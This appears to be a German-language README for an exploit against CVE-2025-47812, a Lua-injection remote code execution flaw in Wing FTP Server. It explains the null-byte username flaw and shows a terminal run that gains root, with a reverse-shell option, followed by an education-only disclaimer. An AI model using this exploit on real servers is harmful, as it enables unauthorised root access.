
CVE-2025-47812
CVE-2025-47812 ist eine kritische Remote-Code-Ausführung (RCE)-Sicherheitslücke, die Wing FTP Server vor Version 7.4.4 betrifft. Sie wurde von einem Sicherheitsforscher entdeckt und es wurde bestätigt, dass sie aktiv in freier Wildbahn ausgenutzt wird.
Die Schwachstelle liegt in der Authentifizierungslogik des Wing FTP Servers, insbesondere darin, wie er Nullbytes (\0) im username-Parameter behandelt.
Angreifer können durch das Benutzernamenfeld beliebigen Lua-Code einschleusen, den der Server in die Sitzungsdatei schreibt. Wenn diese Sitzungsdatei später verarbeitet wird, wird der eingeschleuste Lua-Code ausgeführt, was Angreifern erlaubt, systemweite Befehle auszuführen.
/loginok.html nicht für nicht vertrauenswürdige Netzwerke freigeben.┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
Dieser Exploit wird nur zu Bildungszwecken bereitgestellt. Verwenden Sie ihn verantwortungsvoll und nur auf Systemen, für die Sie explizite Erlaubnis zum Testen haben. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.